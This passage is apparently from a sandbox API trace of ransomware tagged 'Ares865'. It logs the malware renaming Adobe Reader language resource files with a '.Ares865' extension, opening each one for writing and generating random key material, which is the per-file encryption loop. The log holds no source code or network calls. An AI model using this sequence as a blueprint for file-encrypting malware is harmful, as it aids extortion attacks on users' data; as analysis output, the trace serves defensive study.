lpString2="DisplayLanguageNames.fr_FR_PREEURO.txt" | out: lpString1="DisplayLanguageNames.fr_FR_PREEURO.txt") returned="DisplayLanguageNames.fr_FR_PREEURO.txt" [0160.074] lstrlenW (lpString="DisplayLanguageNames.fr_FR_PREEURO.txt") returned 38 [0160.074] lstrlenW (lpString="Ares865") returned 7 [0160.074] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0160.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt.Ares865") returned 123 [0160.074] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0160.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28484) returned 1 [0160.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.083] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.085] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.he.txt" | out: lpString1="DisplayLanguageNames.he.txt") returned="DisplayLanguageNames.he.txt" [0160.085] lstrlenW (lpString="DisplayLanguageNames.he.txt") returned 27 [0160.085] lstrlenW (lpString="Ares865") returned 7 [0160.085] lstrcmpiW (lpString1=".he.txt", lpString2="Ares865") returned -1 [0160.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt.Ares865") returned 112 [0160.085] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt.ares865"), dwFlags=0x1) returned 1 [0160.087] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26562) returned 1 [0160.087] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.088] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.094] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.095] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.095] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.096] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.he_IL.txt" | out: lpString1="DisplayLanguageNames.he_IL.txt") returned="DisplayLanguageNames.he_IL.txt" [0160.096] lstrlenW (lpString="DisplayLanguageNames.he_IL.txt") returned 30 [0160.096] lstrlenW (lpString="Ares865") returned 7 [0160.096] lstrcmpiW (lpString1="_IL.txt", lpString2="Ares865") returned -1 [0160.096] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt.Ares865") returned 115 [0160.096] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt.ares865"), dwFlags=0x1) returned 1 [0160.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26562) returned 1 [0160.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.103] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.103] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.103] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.104] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.hr.txt" | out: lpString1="DisplayLanguageNames.hr.txt") returned="DisplayLanguageNames.hr.txt" [0160.104] lstrlenW (lpString="DisplayLanguageNames.hr.txt") returned 27 [0160.104] lstrlenW (lpString="Ares865") returned 7 [0160.104] lstrcmpiW (lpString1=".hr.txt", lpString2="Ares865") returned -1 [0160.105] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt.Ares865") returned 112 [0160.105] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt.ares865"), dwFlags=0x1) returned 1 [0160.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28200) returned 1 [0160.107] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.111] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.111] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.112] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.hr_HR.txt" | out: lpString1="DisplayLanguageNames.hr_HR.txt") returned="DisplayLanguageNames.hr_HR.txt" [0160.112] lstrlenW (lpString="DisplayLanguageNames.hr_HR.txt") returned 30 [0160.112] lstrlenW (lpString="Ares865") returned 7 [0160.112] lstrcmpiW (lpString1="_HR.txt", lpString2="Ares865") returned -1 [0160.113] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt.Ares865") returned 115 [0160.113] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt.ares865"), dwFlags=0x1) returned 1 [0160.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.115] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28200) returned 1 [0160.115] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.119] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.119] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.119] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.120] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.hu.txt" | out: lpString1="DisplayLanguageNames.hu.txt") returned="DisplayLanguageNames.hu.txt" [0160.120] lstrlenW (lpString="DisplayLanguageNames.hu.txt") returned 27 [0160.120] lstrlenW (lpString="Ares865") returned 7 [0160.120] lstrcmpiW (lpString1=".hu.txt", lpString2="Ares865") returned -1 [0160.121] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt.Ares865") returned 112 [0160.121] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt.ares865"), dwFlags=0x1) returned 1 [0160.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28158) returned 1 [0160.123] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.124] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.124] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.127] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.128] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.128] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.129] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.hu_HU.txt" | out: lpString1="DisplayLanguageNames.hu_HU.txt") returned="DisplayLanguageNames.hu_HU.txt" [0160.129] lstrlenW (lpString="DisplayLanguageNames.hu_HU.txt") returned 30 [0160.129] lstrlenW (lpString="Ares865") returned 7 [0160.129] lstrcmpiW (lpString1="_HU.txt", lpString2="Ares865") returned -1 [0160.129] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt.Ares865") returned 115 [0160.129] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt.ares865"), dwFlags=0x1) returned 1 [0160.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28158) returned 1 [0160.132] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.133] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.133] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.136] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.137] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.it.txt" | out: lpString1="DisplayLanguageNames.it.txt") returned="DisplayLanguageNames.it.txt" [0160.137] lstrlenW (lpString="DisplayLanguageNames.it.txt") returned 27 [0160.137] lstrlenW (lpString="Ares865") returned 7 [0160.137] lstrcmpiW (lpString1=".it.txt", lpString2="Ares865") returned -1 [0160.138] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt.Ares865") returned 112 [0160.138] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt.ares865"), dwFlags=0x1) returned 1 [0160.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.140] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0160.140] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.141] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.141] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.144] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.145] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.145] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.146] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.it_CH.txt" | out: lpString1="DisplayLanguageNames.it_CH.txt") returned="DisplayLanguageNames.it_CH.txt" [0160.146] lstrlenW (lpString="DisplayLanguageNames.it_CH.txt") returned 30 [0160.146] lstrlenW (lpString="Ares865") returned 7 [0160.146] lstrcmpiW (lpString1="_CH.txt", lpString2="Ares865") returned -1 [0160.146] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt.Ares865") returned 115 [0160.146] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt.ares865"), dwFlags=0x1) returned 1 [0160.152] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.152] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28302) returned 1 [0160.152] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.153] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.153] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.158] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.158] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.159] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.it_IT.txt" | out: lpString1="DisplayLanguageNames.it_IT.txt") returned="DisplayLanguageNames.it_IT.txt" [0160.159] lstrlenW (lpString="DisplayLanguageNames.it_IT.txt") returned 30 [0160.159] lstrlenW (lpString="Ares865") returned 7 [0160.159] lstrcmpiW (lpString1="_IT.txt", lpString2="Ares865") returned -1 [0160.160] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt.Ares865") returned 115 [0160.160] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt.ares865"), dwFlags=0x1) returned 1 [0160.162] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.162] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0160.163] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.163] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.163] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.168] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.170] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.it_IT_PREEURO.txt" | out: lpString1="DisplayLanguageNames.it_IT_PREEURO.txt") returned="DisplayLanguageNames.it_IT_PREEURO.txt" [0160.170] lstrlenW (lpString="DisplayLanguageNames.it_IT_PREEURO.txt") returned 38 [0160.170] lstrlenW (lpString="Ares865") returned 7 [0160.170] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0160.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt.Ares865") returned 123 [0160.170] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0160.177] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 